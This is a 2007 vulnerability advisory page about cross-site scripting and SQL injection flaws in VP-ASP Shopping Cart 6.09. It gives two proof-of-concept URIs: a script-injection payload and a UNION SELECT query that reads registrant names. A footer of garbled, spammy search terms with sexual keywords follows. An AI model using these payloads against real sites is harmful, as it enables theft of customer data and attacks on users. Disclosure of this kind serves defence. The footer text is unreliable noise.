about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities


Title VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published 2007-01-11-12:00AM
Updated 2007-01-12-05:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of these vulnerabilities.
Vulnerable  VPASP Shopping Cart 6.09
Not Vulnerable  
Code   To exploit a cross-site scritping issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 17:19:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
walpaper+s www.soufuw Www.Sexsyp Supar sex t696t six hindi sexsye www.oldmo. trisha sex HOTGARI.CO CMS is Fre sexi movie WWW.XMOVES xpl/exploi mambo Remo www.oldmo. chinasexyg addguest.h phpbb%202. news for C phpbb%202. www.huaxm. x555-info Tamil sex HOTGARI.CO . jotspot Www.xnx.co Sexy+woman Www.Indian chocalate tamilsexci India Sex x555-info Worldsex m Karesma Wap.sex.co www.madona tamilsexci news searc chathurika artis indi tudung www.madona sexi stori t776t cici wap.c Hindi darh sexi stori t776t